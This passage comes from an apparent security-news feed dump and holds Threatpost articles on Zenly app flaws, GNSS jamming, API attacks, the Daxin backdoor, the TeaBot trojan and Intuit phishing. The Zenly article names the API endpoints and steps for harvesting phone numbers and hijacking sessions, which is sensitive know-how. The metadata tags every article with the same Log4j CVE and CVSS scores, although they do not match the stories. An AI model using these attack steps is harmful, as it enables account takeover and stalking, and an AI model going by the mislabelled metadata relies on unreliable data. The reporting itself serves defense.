CEO;\n * Retrieve the phone number of the CEO through their username by exploiting the vulnerability;\n * Carry out a spear-phishing attack, using the phone number of the CEO;\n * And, an attacker can also repeat these steps to obtain the phone number of other employees and thus prepare a more credible attack.\n\n### **Anatomy of an Exploit**\n\nThe vulnerability makes use of the \u201cAdd by Username\u201d flow, which starts by searching a known username, according to Checkmarx.\n\nThen, \u201can environment that enables intercepting and decoding network requests\u2026to gain visibility over network activity\u201d can be used to view requests that occur during the username search.\n\n\u201cBy observing the response of the request that was executed on the /UserPublicFriends endpoint, a list of friends can be seen, although it is not displayed on the user interface of the application,\u201d according to the analysis. \u201cThis list contains every friend of the user, one of them is Bogus_CEO (bogus CEO of Zenly, for demonstration purposes). Note that the response also contains their username, which could in turn be used to repeat this process and obtain their friends list instead.\u201d\n\nOnce the target username has been identified, the same interceptor can get used to obtain the associated phone number via a view called \u201cAdd by Username\u201d view, then tapping the \u201cAdd as Friend\u201d button, according to researchers.\n\n\u201cThis friend invitation will trigger a request to the /FriendRequestCreate endpoint, whose response contains specific information regarding both our user and the target user,\u201d they added. \u201cNote that the response contains both our phone number and the phone number of the target user, even though our friend request was never accepted by the target user.\u201d\n\n## **Account Takeover Issue**\n\nThe second vulnerability is also rated as medium-severity. A successful exploit would allow an attacker to access a user\u2019s location, notifications, conversations and friends\u2019 information just like the legitimate user could.\n\nThe bug exists in the user-authentication flow, according to Checkmarx, That authentication uses SMS messages containing verification codes to validate sessions.\n\nAfter the SMS message is sent to the user, the app calls the /SessionVerify endpoint with both the session token and the verification code received by SMS.\n\nAn attacker can abuse the /SessionCreate endpoint to steal session tokens, the researchers explained: \u201cOnce the legitimate user validates the SMS code for that session token, the session will become valid for both the legitimate user and the attacker\u2026This means that the attacker now has a valid session for the account of the legitimate user, even though the attacker never knew the verification code.\u201d\n\nThe reason why the bug is only rated medium is that an exploit is difficult to carry out. Attackers would need to know the mobile phone number of the victim (possible via the first bug). They also must know when the victim will login, sign up, register a new device or go through the authentication flow for any other reason.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T20:07:34", "type": "threatpost", "title": "Zenly Social-Media App Bugs Allow Account Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T20:07:34", "id": "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "href": "https://threatpost.com/zenly-bugs-account-takeover/178646/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T20:14:45", "description": "In a warning to aviation authorities and air operators on Thursday, the European Union Aviation Safety Agency (EASA) warned of satellite jamming and spoofing attacks across a broad swath of Eastern Europe that could affect air navigation systems.\n\nThe warning came in tandem with a separate alert from the FBI and the U.S. Cybersecurity Infrastructure and Security Agency (CISA) that hackers could be targeting satellite communications networks in general.\n\n## **Quit Jammin\u2019 Me**\n\nThe navigation-jamming attacks affecting airplanes started Feb. 24, the first day of the Russian invasion of Ukraine, EASA said \u2013 and they\u2019ve continued to proliferate. So far, the affected areas include the Black Sea airspace, Eastern Finland, the Kaliningrad region and other Baltic areas, and the Eastern Mediterranean area near Cyprus, Turkey, Lebanon, Syria and Israel, as well as Northern Iraq.\n\n\u201cThe effects of [Global Navigation Satellite Systems (GNSS)] jamming and/or possible spoofing were observed by aircraft in various phases of their flights, in certain cases leading to re-routing or even to change the destination due to the inability to perform a safe landing procedure,\u201d EASA warned (PDF). \u201cUnder the present conditions, it is not possible to predict GNSS outages and their effects.\u201d\n\nLosing a GNSS signal could result in many negative outcomes, including pilots \u201cflying blind,\u201d without the use of waypoint navigation to tell where they are. Outages could also affect the ability for an airplane\u2019s instrumentation to accurately track the aircraft\u2019s position, which could lead to a plane entering contested airspace; the inability to properly gauge one\u2019s proximity to the ground (which could trigger pull-up commands, according to the alert); or the failure of systems that address dangers like wind shear.\n\n\u201cThe magnitude of the issues generated by such outage would depend upon the extent of the area concerned, on the duration and on the phase of flight of the affected aircraft,\u201d EASA warned.\n\nThe agency urged air operators to make sure that fall-back conventional navigation infrastructure is fully operational onboard the aircraft, and to ensure reliable surveillance coverage that is resilient to GNSS interference, such as ground-based navigational aids (i.e., Distance Measuring Equipment or DME, and Very High Frequency omnidirectional range or VOR).\n\n\u201cVerify the aircraft position by means of conventional navigation aids when flights are operated in proximity of the affected areas; check that the navigation aids critical to the operation for the intended route and approach are available; and remain prepared to revert to a conventional arrival procedure where appropriate and inform air traffic controllers in such a case,\u201d EASA recommended. \u201cEnsure, in the flight planning and execution phase, the availability of alternative conventional arrival and approach procedures (i.e. an aerodrome in the affected area with only GNSS approach procedure should not be considered as destination or alternate).\u201d\n\n## **CISA Warns on Satellite Network Hacking**\n\nThe concerns over the hacking of satellite systems in general also began Feb. 24, when Ukrainian official reported that hackers had apparently compromised one of the nation\u2019s satellite systems. According [to Reuters](<https://www.reuters.com/world/europe/exclusive-us-spy-agency-probes-sabotage-satellite-internet-during-russian-2022-03-11/>), the attack made communication with the Viasat KA-SAT satellite impossible, which resulted in internet outages across Europe, with tens of thousands of people cut off.\n\nThe cyberattackers took advantage of a misconfigured management interface for the satellite network, Viasat said.\n\nThe National Security Agency is looking into whether the attack was carried out by Russian state-sponsored actors, according to the report.\n\nThis week, CISA [tersely warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-076a>) that it is \u201caware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers\u2019 customer environments.\u201d\n\nThe agency advised satellite operators to start monitoring at ingress and egress points for anomalous traffic, including the use of various remote access tools (Telnet, FTP, SSH and so on); connections out to \u201cunexpected\u201d network segments; unauthorized use of local or backup accounts; unexpected traffic to terminals or closed-group SATCOM networks; and brute-force login attempts.\n\nSatellite customers meanwhile should implement multifactor authentication (MFA) on their accounts, CISA warned, and should shore up least-privilege approaches for any sensitive areas served by satellite links.\n\nAndreas Galauner, lead security researcher at Rapid7, noted that in the U.S., critical infrastructure is likely the target for such attacks.\n\n\u201cAlmost no private individual uses SATCOM, as it is costly and the latency is too high and slow,\u201d he said via email. \u201cThis leaves industrial and critical infrastructures, which makes SATCOM an appealing target.\u201d\n\nJames McQuiggan, security awareness advocate at KnowBe4, made a similar assessment.\n\n\u201cCommunication is a critical element needed in life these days, whether between families or between governments,\u201d he emailed. \u201cIf the ability to communicate is lost, it becomes challenging to strategize, coordinate or plan. When cybercriminals are targeting this element of critical infrastructure, cyber-resiliency is essential to remain in contact. Organizations working with SATCOM products or services need to ensure protections to secure access to the devices with multi-factor authentication. Ensure all systems are up to date with software and firmware updates, increase monitoring of traffic and logs, and review incident response plans to prepare for an outage.\u201d\n\nISPs of all stripes should be vigilant, Galauner added.\n\n\u201cEven though this particular risk relates to satellite communication networks, this has happened before in \u2018normal\u2019 ISPs,\u201d he said. \u201cIn those instances, what got \u2018pwned\u2019 is the CPE: modems and routers that weren\u2019t configured properly by the ISP. This could happen on DSL and cable lines as much as it can happen here. However, a satellite network, possibly spanning huge geographical areas, might allow attackers to perform more widespread attacks without having to be in the physical vicinity.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T20:05:36", "type": "threatpost", "title": "Agencies Warn on Satellite Hacks & GPS Jamming Affecting Airplanes, Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T20:05:36", "id": "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "href": "https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 percent increase in attack takeovers. Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs) that \u201chave become the glue that holds today\u2019s apps together.\u201d as Cequence SecurityHacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong},'\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote \u201d \u2018 \u201d into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud, **such as the two attacks on retailers described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. Bots drove the traffic to 36M (1200 percent) to 129M (4300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game. \u201c**Attack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite patter of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Jason also offered advice for organizations to detect these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Jason that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_**[ **_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter team noticed the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. \u201cSpecifically, the malware avoids starting its own network services. Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, they added \u2013 and further, it can set up daisy-chain communications, researchers added to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is that a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during custom key exchange. When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-02T22:50:57", "description": "The TeaBot banking trojan \u2013 also known as \u201cAnatsa\u201d \u2013 has been spotted on the Google Play store, researchers from Cleafy have [discovered](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>).\n\nThe malware \u2013 designed to intercept SMS messages and login credentials from unwitting users \u2013 affected users of \u201cmore than 400 banking and financial apps, including those from Russia, China, and the U.S,\u201d its report claims.\n\nThis isn\u2019t the first time TeaBot has terrorized Android users.\n\n## TeaBot Just Won\u2019t Die\n\nTeaBot was first [discovered](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) last year. It\u2019s a relatively straightforward malware designed to siphon banking, contact, SMS and other types of private data from infected devices. What makes it unique \u2013 what gives it such staying power \u2013 is the clever means by which it spreads.\n\nTeaBot requires no malicious email or text message, no fraudulent website or third-party service. Instead, it typically comes packaged in a dropper application. Droppers are programs that seem legitimate from the outside, but in fact act as vehicles to deliver a second-stage malicious payload.\n\nTeaBot droppers have masked themselves as ordinary QR code or PDF readers. Hank Schless, senior manager of security solutions at Lookout, explained via email that attackers \u201cusually stick to utility apps like QR code scanners, flashlights, photo filters, or PDF scanners because these are apps that people download out of necessity and likely won\u2019t put as much time into looking at reviews that might impact their decision to download.\u201d\n\nThis tactic appears to be effective. In January, an app called QR Code Reader \u2013 Scanner App [was distributing](<https://threatpost.com/fbi-malicious-qr-codes/177902/>) 17 different Teabot variants for a little over a month. It managed to pull in more than 100,000 downloads by the time it was discovered.\n\nOther TeaBot droppers \u2013 [discovered](<https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html>) by Dutch security firm ThreatFabric last November \u2013 have been packaged under many names, such as QR Scanner 2021, PDF Document Scanner and CryptoTracker. The latest, [according](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>) to security firm Cleafy, was QR Code & Barcode \u2013 Scanner.\n\n## Why Can\u2019t TeaBot Be Stopped?\n\nApp stores have [policies](<https://www.google.com/about/unwanted-software-policy.html>) and protections aimed at combating malware. Google Play Protect, for example, helps [root out](<https://support.google.com/googleplay/answer/2812853?hl=en>) malicious apps before they\u2019re installed and [scans](<https://developers.google.com/android/play-protect/client-protections>) for evidence of misdoing on a daily basis.\n\nHowever, TeaBot droppers aren\u2019t obviously malicious. They might seem perfectly uninteresting, at least on the surface.\n\nOnce a user opens one of these nondescript apps, they\u2019re prompted to download a software update. The update is, in fact, a second app containing a malicious payload.\n\nIf the user gives their app permission to install software from an unknown source, the infection process begins. Like other Android malware, the TeaBot malware attempts to leverage Accessibility Services. [Such attacks](<https://threatpost.com/alien-android-2fa/159517/>) use an advanced remote access feature that abuses the TeamViewer application \u2013 a remote access and desktop sharing tool \u2013 giving the bad actor behind the malware remote control over the victim\u2019s devices.\n\nThe ultimate goal of these attacks is to retrieve sensitive information such as login credentials, SMS and 2FA codes from the device\u2019s screen, as well as to perform malicious actions on the device, the report said.\n\n## Here\u2019s How TeaBot _Can_ Be Stopped\n\nTeaBot attacks have grown fast. As Cleafy notes, \u201cIn less than a year, the number of applications targeted by TeaBot have grown more than 500%, going from 60 targets to over 400.\u201d\n\nWhat can be done to stop them?\n\n\u201cReal-time scanning of app downloads \u2013 even if the app doesn\u2019t originate from Google Play \u2013 would help to mitigate this issue,\u201d Shawn Smith, director of infrastructure at nVisium, told Threatpost on Wednesday via email, adding that \u201cadditional warning messages when installing app add-ons that aren\u2019t on Google Play could be useful, too.\u201d\n\nLeo Pate, managing consultant at nVisium, also told Threatpost via email on Wednesday that \u201cGoogle could be implementing checks on permissive permissions for applications to run, obtaining lists of specific hardcoded public IPs and domain names. Then, [Google could run] them through various sources to see if they\u2019re \u2018bad.'\u201d\n\nUntil app stores have fixed the problem with droppers, users will have to remain alert, Schless noted. \u201cEveryone knows that they should have antivirus and anti-malware apps on their computers, and our mobile devices shouldn\u2019t be treated any differently.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T22:50:09", "type": "threatpost", "title": "TeaBot Trojan Haunts Google Play Store, Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-02T22:50:09", "id": "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "href": "https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Just in time for tax season, Intuit is warning customers of a phishing campaign that threatens to close user accounts if they don\u2019t click on a malicious link.\n\nThe attacks on the accounting-software specialist that many people use for filing U.S. income tax forms comes as phishers overall are ramping up more creative and stealthy ways to trick users into installing malware or giving up personal data.\n\nIntuit posted a screenshot from a suspicious email customers reported receiving, which the company insists \u201cdid not come from Intuit,\u201d according to [a media statement](<https://security.intuit.com/security-notices>) posted Thursday.\n\nThe faux email, purporting to come from the Intuit Maintenance Team, informs the recipient that his or her account has been \u201ctemporarily disabled\u201d \u201cdue to inactivity\u201d and that it\u2019s \u201ccompulsory\u201d to restore access to the account within 24 hours.\n\n\u201cThis is a result of recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season,\u201d according to the email.\n\nThe email directs users to a link, https://proconnect[dot]intuit.com/Pro/Update, claiming it will immediately restore access to their accounts.\n\n## **Intuit: Resist the Bait**\n\nThough Intuit does not provide information on what happens if users click on the link, the company is warning customers that it is likely malicious and not to click on it nor on any attachment that is associated with the email.\n\nIf a customer already has followed the email\u2019s instructions and clicked on the link, Inuit recommends that users delete any resulting downloads immediately; scan their system using an up-to-date antivirus program; and change their passwords.\n\nOne security professional said he was not surprised to learn of such an engineered attack on Intuit and expects that more will come as we get deeper into tax season.\n\n\u201cThis is not an unusual way for cybercriminals to use to trick people into logging into their accounts on a fake website, allowing them to steal the user\u2019s credentials,\u201d observed Erich Kron, security awareness advocate at security awareness and training firm KnowBe4. \u201cThese kind of attacks are certain to ramp up during tax season, as we are seeing now.\u201d\n\n## **Phishing Attacks Get Smarter**\n\nIndeed, phishers have been escalating attacks with vigor lately, using more creative ways to both trick users into taking the bait as well as to hide their activity. Researchers have reported a flurry of phishing attacks using new tricks and tactics since the end of last year.\n\nJust this week alone, security researchers have discovered two novel ways phishers are targeting victims. In one, Proofpoint researchers observed adversaries procuring and then using phishing kits that are focused on [bypassing multi-factor authentication (MFA)](<https://threatpost.com/low-detection-phishing-kits-bypass-mfa/178208/>) methods, by stealing authentication tokens via man-in-the-middle (MiTM) attacks.\n\nThe other phishing campaign revealed this week described attackers [using an under-the-radar PowerPoint file](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) to hide malicious executables that can rewrite Windows registry settings \u2014 with the goal of ultimately taking over an end user\u2019s computer.\n\nOther recent phishing attacks aimed at stealing credentials found scammers using [a legitimate Google Drive collaboration feature](<https://threatpost.com/scammers-google-drive-malicious-links/160832/>) and leveraging [the \u201cComments\u201d feature of Google Docs](<https://threatpost.com/attackers-exploit-flaw-google-docs-comments/177412/>), respectively, to trick users into clicking on malicious links.\n\nWhile phishing has been around almost as long as people have been sending emails, it\u2019s a threat vector that will never get old, noted one security professional.\n\n\u201cPhishing continues to be a popular means of attack because it 